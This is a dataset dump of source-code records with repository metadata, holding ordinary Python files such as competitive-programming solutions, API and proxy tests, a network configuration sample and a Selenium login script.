blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
14a3acc0bab16e60abbf783682b7aa042165a154
|
20bb1ae805cd796a7c377e55966633441d1d9fd5
|
/uva/10680 LCM/lcm.py
|
b168af4bd0eee42ae91ee9c4dc81041695a8fe27
|
[] |
no_license
|
nathantheinventor/solved-problems
|
1791c9588aefe2ebdc9293eb3d58317346d88e83
|
c738e203fa77ae931b0ec613e5a00f9a8f7ff845
|
refs/heads/master
| 2022-10-27T08:58:23.860159 | 2022-10-13T20:18:43 | 2022-10-13T20:18:43 | 122,110,149 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 559 |
py
|
# UVa 10680 "LCM": for each query n, print the last nonzero digit of lcm(1..n).
# ans[n] caches a value whose last decimal digit is the answer for n.
ans = [0, 1]
cur = 1
# factors[i] collects the distinct prime factors of i (sieve below).
factors = [[] for _ in range(1000001)]
for i in range(2, 1000001, 2):
    factors[i].append(2)
for i in range(3, 1000001, 2):
    if len(factors[i]) == 0:
        # i has no factor recorded yet, so i is an odd prime:
        # mark it as a prime factor of all of its multiples.
        for k in range(i, 1000001, i):
            factors[k].append(i)
for i in range(2, 1000001):
    if len(factors[i]) == 1:
        # Exactly one distinct prime factor => i is a prime power p^k,
        # which multiplies lcm(1..i-1) by p.
        for factor in factors[i]:
            cur *= factor
        # Strip trailing zeros, then keep only the low three digits.
        # NOTE(review): keeping three digits appears sufficient to track future
        # trailing-zero stripping because only one prime is multiplied in per
        # step — TODO confirm against the judge's data.
        while cur % 10 == 0:
            cur //= 10
        cur %= 1000
    ans.append(cur)
n = int(input())
# Queries arrive one per line on stdin; a 0 terminates the input.
while n > 0:
    # print(n)
    print(ans[n] % 10)
    n = int(input())
|
[
"[email protected]"
] | |
4cd078afb5311f126095acf7b92ad0506caea81c
|
87796f8b79b325cdfca7a98b120d690a13ebd267
|
/capture/noworkflow/tests/prov_definition/__init__.py
|
b9e742c0dad1702ab87430c5fbb2e8279693e496
|
[
"MIT"
] |
permissive
|
raffaelfoidl/noworkflow
|
c53c6be45960a93aa546fd8f6c967af2b7c31c93
|
aa4ca189df24fec6c7abd32bcca6a097b21fdf31
|
refs/heads/master
| 2021-01-06T16:32:57.036864 | 2020-03-23T14:12:37 | 2020-03-23T14:12:37 | 241,398,493 | 0 | 0 |
MIT
| 2020-02-18T15:36:16 | 2020-02-18T15:36:15 | null |
UTF-8
|
Python
| false | false | 426 |
py
|
# Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
from __future__ import (absolute_import, print_function,
division, unicode_literals)
from .slicing_test import TestSlicingDependencies
# Public API of this test package.
# NOTE(review): the b"..." prefix (with unicode_literals in effect) keeps the
# entry a native str on Python 2; on Python 3 it is bytes and will NOT match
# the exported name for tools that compare against __all__ — confirm intended.
__all__ = [
    b"TestSlicingDependencies",
]
|
[
"[email protected]"
] | |
8614ee5eeee6d74b19ddc1e1113d47b06dddb8bd
|
4e5141121d8b4015db233cbc71946ec3cfbe5fe6
|
/samples/basic/crud/gnmi/models/cisco-ios-xr/Cisco-IOS-XR-ethernet-lldp-cfg/gn-create-xr-ethernet-lldp-cfg-20-ydk.py
|
3d8398de12dc3fa89df78ddc852a3fa57177f1dc
|
[
"Apache-2.0"
] |
permissive
|
itbj/ydk-py-samples
|
898c6c9bad9d6f8072892300d42633d82ec38368
|
c5834091da0ebedbb11af7bbf780f268aad7040b
|
refs/heads/master
| 2022-11-20T17:44:58.844428 | 2020-07-25T06:18:02 | 2020-07-25T06:18:02 | 282,382,442 | 1 | 0 | null | 2020-07-25T06:04:51 | 2020-07-25T06:04:50 | null |
UTF-8
|
Python
| false | false | 2,824 |
py
|
#!/usr/bin/env python
#
# Copyright 2016 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Create configuration for model Cisco-IOS-XR-ethernet-lldp-cfg.
usage: gn-create-xr-ethernet-lldp-cfg-20-ydk.py [-h] [-v] device
positional arguments:
device gNMI device (http://user:password@host:port)
optional arguments:
-h, --help show this help message and exit
-v, --verbose print debugging messages
"""
from argparse import ArgumentParser
from urlparse import urlparse
from ydk.path import Repository
from ydk.services import CRUDService
from ydk.gnmi.providers import gNMIServiceProvider
from ydk.models.cisco_ios_xr import Cisco_IOS_XR_ethernet_lldp_cfg \
as xr_ethernet_lldp_cfg
import os
import logging
YDK_REPO_DIR = os.path.expanduser("~/.ydk/")
def config_lldp(lldp):
    """Enable the LLDP protocol on the given Lldp configuration object."""
    # Global enable only; no per-interface LLDP settings are touched here.
    lldp.enable = True
if __name__ == "__main__":
    """Execute main program."""
    # Parse CLI arguments: an optional -v/--verbose flag and the target device URL.
    parser = ArgumentParser()
    parser.add_argument("-v", "--verbose", help="print debugging messages",
                        action="store_true")
    parser.add_argument("device",
                        help="gNMI device (http://user:password@host:port)")
    args = parser.parse_args()
    # NOTE(review): `from urlparse import urlparse` above is Python 2 only;
    # on Python 3 the module is urllib.parse — confirm the target interpreter.
    device = urlparse(args.device)
    # log debug messages if verbose argument specified
    if args.verbose:
        logger = logging.getLogger("ydk")
        logger.setLevel(logging.INFO)
        handler = logging.StreamHandler()
        formatter = logging.Formatter(("%(asctime)s - %(name)s - "
                                       "%(levelname)s - %(message)s"))
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    # create gNMI provider; the model repository is cached per-host under ~/.ydk/
    repository = Repository(YDK_REPO_DIR+device.hostname)
    provider = gNMIServiceProvider(repo=repository,
                                   address=device.hostname,
                                   port=device.port,
                                   username=device.username,
                                   password=device.password)
    # create CRUD service
    crud = CRUDService()
    lldp = xr_ethernet_lldp_cfg.Lldp()  # create object
    config_lldp(lldp)  # add object configuration
    # create configuration on gNMI device
    crud.create(provider, lldp)
    exit()
# End of script
|
[
"[email protected]"
] | |
174b23a0701205e2da87894ca11e6fddd5a246d5
|
38a263d52c52a8834b175e867330d8415dad7384
|
/Regression_suite_bigc/api/test_shipping_method_api.py
|
39dd52af582926da309c4c1bc141b4d413de60a9
|
[] |
no_license
|
testing-sravan/tests-scripts-worked
|
4e57c47c4ea9a9bc22e85a8b6d628615907537bd
|
33c579918356f6ff1cdfd5635d6eba1d85eba0b7
|
refs/heads/master
| 2021-01-10T20:39:12.805680 | 2014-09-15T04:54:02 | 2014-09-15T04:54:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,893 |
py
|
from lib.api_lib import *
from lib.shipping_class import *
# Auth key entered when configuring the Australia Post shipping method.
AUSPOST_AUTH_KEY = "bzfac4efaf7e7e51a4b1dbd7cc76cb31"
# Permanently skipped (and the "ttest" prefix keeps pytest from collecting it).
@pytest.mark.skipif("True")
def ttest_disable_shipping_reboot(browser, url, email, password):
    # Disable the ShippingReboot feature flag through the admin UI.
    shipping = ShippingClass(browser)
    shipping.go_to_admin(browser, url, email, password)
    shipping.set_feature_flag(browser, 'disable', 'ShippingReboot')
def test_create_australian_post_in_control_panel(browser, url, email, password):
    """Create the Australia Post shipping method through the control panel UI."""
    shipping = ShippingClass(browser)
    shipping.go_to_admin(browser, url, email, password)
    shipping.navigate_to_shipping()
    shipping.skip_shipping_intro()
    # NOTE(review): this branch runs the "new" setup helpers when is_new_ui()
    # is False, which looks inverted — confirm against ShippingClass semantics.
    if not shipping.is_new_ui(browser):
        shipping.setup_store_location_new(shipping.au_store_location)
        shipping.add_country_zone(shipping.us_country_zone)
        shipping.open_country_zone("United States")
        shipping.setup_australia_post()
        return
    pytest.skip("Not new UI")
    # NOTE(review): everything below is unreachable — pytest.skip() raises.
    # Kept as-is; it is the legacy-UI flow that used to run here.
    shipping.setup_store_location(browser, "Australia","New South Wales","2000")
    browser.find_element_by_id('tab1').click()
    browser.execute_script("$('#div1 .dropdown-trigger:first').click()")
    WebDriverWait(browser, 30).until(lambda s: s.find_element_by_link_text('Edit Methods').is_displayed() and s.find_element_by_link_text('Edit Methods'))
    browser.find_element_by_link_text('Edit Methods').click()
    shipping.disable_the_shipping_method(browser)
    WebDriverWait(browser, 30).until(lambda s: s.find_element_by_xpath('//input[@value="Add a Shipping Method..."]').is_displayed() and s.find_element_by_xpath('//input[@value="Add a Shipping Method..."]'))
    browser.find_element_by_xpath('//input[@value="Add a Shipping Method..."]').click()
    browser.find_element_by_xpath('//span[text()="Australia Post"]').click()
    element= shipping.wait_until_element_present('shipping_australiapost_auth_key', "ID")
    element.send_keys(AUSPOST_AUTH_KEY)
    element = shipping.wait_until_element_present('Select All', 'LINK')
    element.click()
    browser.find_element_by_name('SubmitButton1').click()
    shipping.verify_and_assert_success_message(browser, "The shipping method has been created successfully.", ".alert-success")
#JSON Payload
def test_get_shipping_methods(auth_token, url, username, state):
    """GET /api/v2/shipping/methods (JSON) and verify Australia Post exists.

    Also stores the first method id in `state` for the follow-up by-id test.
    """
    api = urlparse.urljoin(url, 'api/v2/shipping/methods')
    result = basic_auth_get(api, username, auth_token)
    newdata = json.loads(result.text)
    state['shipping_method_id'] = newdata[0]['id']
    assert newdata[0]['id'] > 0
    # BUG FIX: the original did `newdata[item].find('name').text` — XML-style
    # lookups on JSON dicts, with the dict itself used as a list index —
    # wrapped in a bare `except: pass`, so the checks never ran and the test
    # could not fail. Compare the dict fields directly and fail loudly.
    for item in newdata:
        if (item.get('name') == "Australia Post"
                and item.get('method_name') == "shipping_australiapost"):
            return
    assert False, "Australia Post shipping method not found in response"
def test_get_shipping_methods_by_id(auth_token, url, username, state):
    """GET a single shipping method (JSON) by the id captured in the list test."""
    api = urlparse.urljoin(url, 'api/v2/shipping/methods/' + str(state['shipping_method_id']) + '')
    result = basic_auth_get(api, username, auth_token)
    newdata = json.loads(result.text)
    # NOTE(review): assumes the by-id endpoint returns a JSON list like the
    # collection endpoint does — confirm against the API.
    assert newdata[0]['id'] > 0
    # BUG FIX: the original applied XML-style `.find(...)` to JSON dicts and
    # indexed the list with the dict itself, all inside a bare `except: pass`,
    # so no assertion ever executed. Compare dict fields and fail loudly.
    for item in newdata:
        if (item.get('name') == "Australia Post"
                and item.get('method_name') == "shipping_australiapost"):
            return
    assert False, "Australia Post shipping method not found in response"
# XML Payload
def test_get_shipping_methods_xml_payload(auth_token, url, username, state):
    """GET /api/v2/shipping/methods (XML) and verify Australia Post exists."""
    api = urlparse.urljoin(url, 'api/v2/shipping/methods')
    result = basic_auth_get(api, username, auth_token, payload_format = 'xml')
    newdata = etree.fromstring(result.text)
    state['shipping_method_id_xml'] = newdata[0].find('id').text
    # BUG FIX: Element.text is a string; compare numerically instead of
    # `str > int` (always-true on Python 2, TypeError on Python 3).
    assert int(newdata[0].find('id').text) > 0
    # BUG FIX: the original indexed the root element with a child Element
    # (`newdata[item]`, a TypeError) inside a bare `except: pass`, so the
    # checks never ran. Inspect each child element's fields directly.
    for item in newdata:
        if (item.findtext('name') == "Australia Post"
                and item.findtext('method_name') == "shipping_australiapost"):
            return
    assert False, "Australia Post shipping method not found in response"
def test_get_shipping_methods_by_id_xml_payload(auth_token, url, username, state):
    """GET a single shipping method (XML) by the id captured in the XML list test."""
    api = urlparse.urljoin(url, 'api/v2/shipping/methods/' + str(state['shipping_method_id_xml']) + '')
    result = basic_auth_get(api, username, auth_token, payload_format = 'xml')
    newdata = etree.fromstring(result.text)
    # BUG FIX: compare the id numerically; `.text > 0` compared str with int.
    assert int(newdata[0].find('id').text) > 0
    # BUG FIX: the original indexed the root element with a child Element and
    # swallowed the resulting TypeError with a bare `except: pass`, so nothing
    # was ever checked. Inspect each child element's fields directly.
    for item in newdata:
        if (item.findtext('name') == "Australia Post"
                and item.findtext('method_name') == "shipping_australiapost"):
            return
    assert False, "Australia Post shipping method not found in response"
# Permanently skipped (and the "ttest" prefix keeps pytest from collecting it).
@pytest.mark.skipif("True")
def ttest_delete_australian_post_in_control_panel(browser, url, email, password):
    """Delete the Australia Post shipping method through the control panel UI."""
    shipping = ShippingClass(browser)
    shipping.go_to_admin(browser, url, email, password)
    browser.find_element_by_link_text("Setup & Tools").click()
    browser.find_element_by_link_text('Shipping').click()
    browser.find_element_by_id('tab1').click()
    browser.execute_script("$('#div1 .dropdown-trigger:first').click()")
    WebDriverWait(browser, 30).until(lambda s: s.find_element_by_link_text('Edit Methods').is_displayed() and s.find_element_by_link_text('Edit Methods'))
    browser.find_element_by_link_text('Edit Methods').click()
    # Tick the grid checkbox on the Australia Post row via jQuery, then delete.
    browser.execute_script("$('.GridRow').find('td:contains(Australia Post)').parent('tr').children('td:eq(0)').find('input').attr('checked','checked')")
    browser.find_element_by_xpath('//input[@value="Delete Selected"]').click()
    # Accept the native confirm dialog; if the driver cannot (e.g. PhantomJS),
    # stub window.confirm and click Delete again.
    # NOTE(review): switch_to_alert() is deprecated in modern Selenium
    # (switch_to.alert) — fine for the pinned driver version, confirm on upgrade.
    try:
        alert = browser.switch_to_alert()
        alert.accept()
    except WebDriverException:
        browser.execute_script("window.confirm = function(){return true;}");
        browser.find_element_by_xpath('//input[@value="Delete Selected"]').click()
    shipping.verify_and_assert_success_message(browser, "The selected shipping methods have been deleted successfully.", ".alert-success")
|
[
"jenkins@localhost"
] |
jenkins@localhost
|
ae79db95820afa78fc580aa49376922c0c238952
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/models/ms_data/datatypes/facets/float_pkg/float_min_inclusive005_xsd/__init__.py
|
2aa44ebe2b8660a5c90d5e944cdea45e6804713b
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 180 |
py
|
from output.models.ms_data.datatypes.facets.float_pkg.float_min_inclusive005_xsd.float_min_inclusive005 import (
FooType,
Test,
)
# Public re-exports for this generated xsdata test-model package.
__all__ = [
    "FooType",
    "Test",
]
|
[
"[email protected]"
] | |
19278d8ef7d38d9fef53807d8b5f43c6599c1860
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_310/ch24_2019_02_28_22_51_17_076072.py
|
a696f9213b91ef86ad0fdb8ed69e705024d7c53c
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 204 |
py
|
def classifica_triangulo(l1, l2, l3):
    """Classify a triangle by its three side lengths.

    Returns "equilátero" (all sides equal), "isóceles" (exactly two equal)
    or "escaleno" (all different).
    """
    if l1 == l2 == l3:
        return "equilátero"
    # BUG FIX: the original only tested pairs involving l1, so a triangle
    # like (2, 3, 3) — where l2 == l3 but l1 differs — was wrongly
    # classified as "escaleno". Check all three pairs.
    elif l1 == l2 or l1 == l3 or l2 == l3:
        return "isóceles"
    else:
        return "escaleno"
|
[
"[email protected]"
] | |
12b57b06ca8399fdc27fa38e011de43de67a8a30
|
94f4bb0f6e43b2eb2f1bdb284a580b76121fa9af
|
/559.py
|
36b10d1ab3ede26c95a47dba50b8ef0aa9c74592
|
[] |
no_license
|
huosan0123/leetcode-py
|
f1ec8226bae732369d4e1989b99ab0ba4b4061c4
|
22794e5e80f534c41ff81eb40072acaa1346a75c
|
refs/heads/master
| 2021-01-25T11:48:17.365118 | 2019-09-12T15:45:34 | 2019-09-12T15:45:34 | 93,934,297 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 547 |
py
|
"""
# Definition for a Node.
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
"""
class Solution(object):
    """LeetCode 559: maximum depth of an N-ary tree (Node defined above)."""
    def maxDepth(self, root):
        """Return the number of nodes on the longest root-to-leaf path.

        :type root: Node
        :rtype: int
        """
        if not root:
            return 0
        # `children` is a (possibly empty) list; track the deepest subtree.
        deepest = 0
        for child in root.children:
            child_depth = self.maxDepth(child)
            if child_depth > deepest:
                deepest = child_depth
        return deepest + 1
|
[
"[email protected]"
] | |
abc71170bebc5eeabbc454115b8a9dcc7b9a858e
|
7db0883137d119565540f2d071638c4016f39213
|
/Note/Spider/2.28-selenium/selenium+phantomjs学习/selenium_study3.py
|
452662361c9123151650e6ef605f1db84e6b3d4e
|
[] |
no_license
|
PhilHuang-d/python---
|
cf22a4cc00d4beaaf75ef7ca87a4c5d31a9d5efe
|
152c18f51838ce652b79a0cd24765b1a1c237eee
|
refs/heads/master
| 2021-09-13T05:32:53.754865 | 2018-04-25T13:36:40 | 2018-04-25T13:36:40 | 108,812,447 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,975 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
__author__ = 'Terry'
# Browser user-agent strings used to disguise the headless browser.
USER_AGENTS = [
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',
    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
    'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0'
]
# Local path of the PhantomJS executable (Windows layout).
phantomjs_driver_path = 'D:/phantomjs/bin/phantomjs.exe'
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import time
# Import the DesiredCapabilities configuration object
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
def save_vcode(driver, element):
    """Screenshot the page and save the given element's region as vcode.png."""
    # Capture the full page first; the element is then cropped out of it.
    driver.get_screenshot_as_file('screenshot.png')
    x = int(element.location['x'])
    y = int(element.location['y'])
    crop_box = (
        x,
        y,
        int(element.location['x'] + element.size['width']),
        int(element.location['y'] + element.size['height']),
    )
    # Crop the element's bounding box with Pillow and save it.
    from PIL import Image
    Image.open('screenshot.png').crop(crop_box).save('vcode.png')
# Build PhantomJS desired-capabilities, starting from the defaults.
dcap = dict(DesiredCapabilities.PHANTOMJS)
# Pick a random user-agent from USER_AGENTS to disguise the browser:
# dcap["phantomjs.page.settings.userAgent"] = (random.choice(USER_AGENTS))
dcap["phantomjs.page.settings.userAgent"] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0'
# Skipping image loading makes page crawling much faster:
# dcap["phantomjs.page.settings.loadImages"] = False
# Launch PhantomJS with the configured capabilities.
driver = webdriver.PhantomJS(phantomjs_driver_path, desired_capabilities=dcap)
# 10-second page-load timeout, similar to requests.get()'s timeout option;
# driver.get() has no timeout of its own and has been seen to hang without it.
driver.set_page_load_timeout(10)
# 10-second script timeout.
driver.set_script_timeout(10)
# Set the virtual screen size.
driver.set_window_size(1366, 768)
# Open Baidu.
driver.get('https://www.baidu.com')
WebDriverWait(driver, 30, 1).until(EC.presence_of_element_located((By.XPATH, '//*[@id="u1"]/a[7]')))
print(driver.title)
time.sleep(1)
# Click to pop up the login window.
login_index = driver.find_element_by_xpath('//*[@id="u1"]/a[7]')
login_index.click()
time.sleep(.5)
# Choose username/password login.
login_user_and_pwd = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]')
login_user_and_pwd.click()
time.sleep(.5)
# Username field ('用户名' below is a placeholder credential, kept verbatim).
user = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__userName"]')
user.clear()
user.send_keys('用户名')
# Password field ('密码' below is a placeholder credential, kept verbatim).
pwd = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__password"]')
pwd.clear()
pwd.send_keys('密码')
while True:
    # Request the next captcha image.
    next_vcode = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCodeChange"]')
    next_vcode.click()
    # Captcha image element; save_vcode crops it to vcode.png for the user.
    vcode_img = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCodeImg"]')
    save_vcode(driver, vcode_img)
    # Ask the operator to type the captcha.
    vcode_input = input('请输入验证码:')
    vcode = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__verifyCode"]')
    # Fill the captcha into the page.
    vcode.send_keys(vcode_input)
    # Submit the login form.
    login = driver.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__submit"]')
    login.click()
    time.sleep(1)
    try:
        # Check whether login succeeded by looking for the username element.
        user_name = driver.find_element_by_xpath('//*[@id="s_username_top"]/span')
        print("登录名为:"+user_name.text)
        print("登录成功:")
        break
    except:
        time.sleep(.3)
driver.get('http://index.baidu.com/?tpl=trend&word=%BB%C6%BD%F0')
# The driver must be quit manually.
driver.quit()
|
[
"[email protected]"
] | |
bfc54acf5cfe74cdca27af81c9e898c7ad2005c3
|
37a67a9531f8c32739ae70fc5be55b4c6acae60d
|
/multinomial.py
|
61b5f29f47a1620d45a703bb42a374da45ab4e3d
|
[
"MIT"
] |
permissive
|
gongkecun/distribution-is-all-you-need
|
da1b1b363df3343e0753e55564311e323cd6c890
|
93ae5ed7fa63607474d61723d2d28d1a4b3c653a
|
refs/heads/master
| 2020-08-27T10:03:21.144561 | 2019-10-24T15:04:43 | 2019-10-24T15:04:43 | 217,326,807 | 0 | 0 |
MIT
| 2019-10-24T15:02:48 | 2019-10-24T15:02:48 | null |
UTF-8
|
Python
| false | false | 1,217 |
py
|
"""
Code by Tae-Hwan Hung(@graykode)
https://en.wikipedia.org/wiki/Multinomial_distribution
3-Class Example
"""
import numpy as np
from matplotlib import pyplot as plt
import operator as op
from functools import reduce
def factorial(n):
    """Return n! for a non-negative integer n (0! == 1)."""
    result = 1
    for k in range(2, n + 1):
        result *= k
    return result
def const(n, a, b, c):
    """Return the multinomial coefficient n! / (a! * b! * c!).

    Requires a + b + c == n.
    """
    assert a + b + c == n
    # True division, as in the original: the result is a float.
    return factorial(n) / (factorial(a) * factorial(b) * factorial(c))
def multinomial(n):
    """Enumerate multinomial coefficients for 3-part compositions of n.

    :param n: number of trials; partitions (a, b, c) with a + b + c == n and
        1 <= a <= b <= c are enumerated.
    :returns: (x, y, mean, std) where y are the coefficients n!/(a! b! c!)
        and x is simply arange(len(y)) for plotting.
    """
    # get all a,b,c where a+b+c == n and a <= b <= c (equal parts allowed,
    # since each inner range starts at the previous index).
    ls = []
    for i in range(1, n + 1):
        for j in range(i, n + 1):
            for k in range(j, n + 1):
                if i + j + k == n:
                    ls.append([i, j, k])
    y = [const(n, l[0], l[1], l[2]) for l in ls]
    x = np.arange(len(y))
    return x, y, np.mean(y), np.std(y)
# Plot the coefficient profiles for three trial counts on one scatter chart,
# then write the figure to graph/multinomial.png (directory must exist).
for n_experiment in [20, 21, 22]:
    x, y, u, s = multinomial(n_experiment)
    plt.scatter(x, y, label=r'$trial=%d$' % (n_experiment))
plt.legend()
plt.savefig('graph/multinomial.png')
plt.show()
|
[
"[email protected]"
] | |
245925707f4f6c6c98786d629ccf351760017361
|
80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019
|
/data/HackerRank-Python/Matrix Script.py
|
114fa5ab8380753bbc2fe298d07e8f760aeb97f0
|
[] |
no_license
|
Ritvik19/CodeBook
|
ef7764d89b790e902ede5802f36d5ca910d8a50e
|
2b4ed7938bbf156553d6ba5cba6216449528f0fc
|
refs/heads/master
| 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 326 |
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# HackerRank "Matrix Script": read an n-row matrix of characters, decode it
# column by column, and collapse any symbol/space run BETWEEN alphanumerics
# into a single space.
n, m = map(int, input().rstrip().split())
matrix = []
for _ in range(n):
    matrix_item = input()
    matrix.append(matrix_item)
# zip(*matrix) transposes the rows so the message reads down the columns;
# the lookbehind/lookahead keep leading/trailing symbols untouched.
print(re.sub(r'(?<=[A-Za-z0-9])([^A-Za-z0-9]+)(?=[A-Za-z0-9])',' ',"".join("".join(decode) for decode in zip(*matrix))))
|
[
"[email protected]"
] | |
e4076d56d19e0b60f79ef0b63139cbc98873367c
|
e92d752737f3e90a47355d5502a364a9e2d0c08b
|
/tests/test_reverseproxy.py
|
c93c3521ab514877f5527c50f379fbd88223bb84
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
miri64/aiocoap
|
c7815758371f0a83c51b058fb0c24e8024feae9f
|
93e699280b644465213fc8ba29bae556475fb6fc
|
refs/heads/master
| 2023-08-15T16:46:27.985718 | 2021-10-05T17:15:00 | 2021-10-05T17:15:00 | 404,324,558 | 0 | 0 |
NOASSERTION
| 2021-09-08T11:39:12 | 2021-09-08T11:39:12 | null |
UTF-8
|
Python
| false | false | 4,526 |
py
|
# This file is part of the Python aiocoap library project.
#
# Copyright (c) 2012-2014 Maciej Wasilak <http://sixpinetrees.blogspot.com/>,
# 2013-2014 Christian Amsüss <[email protected]>
#
# aiocoap is free software, this file is published under the MIT license as
# described in the accompanying LICENSE file.
import asyncio
import unittest
from . import common
from .test_server import WithAsyncLoop, Destructing, WithClient, WithTestServer, CLEANUPTIME
import aiocoap.proxy.client
import aiocoap.cli.proxy
from aiocoap.util import hostportjoin
class WithReverseProxy(WithAsyncLoop, Destructing):
    """Test fixture that runs an aiocoap reverse proxy for the duration of a test.

    The proxy forwards to the real test server both by name (uri_host) and by
    path prefix; the class attributes below define where it listens.
    """
    def setUp(self):
        super(WithReverseProxy, self).setUp()
        # Start the proxy CLI in-process with both name- and path-based routing
        # pointing at the test server's netloc.
        self.reverseproxy = aiocoap.cli.proxy.Main(
            ["--reverse", "--bind", hostportjoin(self.proxyhost, self.proxyport), "--namebased", "%s:%s"%(self.name_for_real_server, self.servernetloc), "--pathbased", "%s:%s"%("/".join(self.path_for_real_server), self.servernetloc)],
            loop=self.loop,
        )
        self.loop.run_until_complete(self.reverseproxy.initializing)
    def tearDown(self):
        super(WithReverseProxy, self).tearDown()
        self.loop.run_until_complete(self.reverseproxy.shutdown())
        # creating a reference loop between the cli instance and its contexts,
        # so that the cli instance's gc-ing is linked to the contexts'.
        # TODO how can we handle this more smoothly?
        self.reverseproxy.outgoing_context._cli = self.reverseproxy
        self.reverseproxy.proxy_context._cli = self.reverseproxy
        self._del_to_be_sure('reverseproxy')
        self.loop.run_until_complete(asyncio.sleep(CLEANUPTIME))
    # Where the proxy listens and the aliases it routes on.
    proxyport = 56839
    proxyhost = common.loopbackname_v6 or common.loopbackname_v46
    proxyaddress = '%s:%d'%(proxyhost, proxyport)
    name_for_real_server = 'aliasedname'
    path_for_real_server = ('aliased', 'name')
class TestReverseProxy(WithReverseProxy, WithClient, WithTestServer):
    """End-to-end tests of the reverse proxy's routing and option handling."""
    @unittest.skipIf(common.using_simple6, "Some proxy tests fail with simple6 (https://github.com/chrysn/aiocoap/issues/88)")
    def test_routing(self):
        """Requests are routed by uri_host alias or path prefix; bare ones fail."""
        yieldfrom = lambda f: self.loop.run_until_complete(f)
        def req():
            # Fresh GET aimed at the proxy's address for resource 'big'.
            request = aiocoap.Message(code=aiocoap.GET)
            request.unresolved_remote = self.proxyaddress
            request.opt.uri_path = ('big',)
            return request
        # Without a hostname or path alias the proxy cannot route the request.
        request = req()
        response = yieldfrom(self.client.request(request).response)
        self.assertEqual(response.code, aiocoap.BAD_REQUEST, "GET without hostname gave resource (something like BAD_REQUEST expected)")
        # Name-based routing via the configured uri_host alias.
        request = req()
        request.opt.uri_host = self.name_for_real_server
        response = yieldfrom(self.client.request(request).response)
        self.assertEqual(response.code, aiocoap.CONTENT, "GET with hostname based proxying was not successful)")
        # Path-based routing via the configured path prefix.
        request = req()
        request.opt.uri_path = self.path_for_real_server + request.opt.uri_path
        response = yieldfrom(self.client.request(request).response)
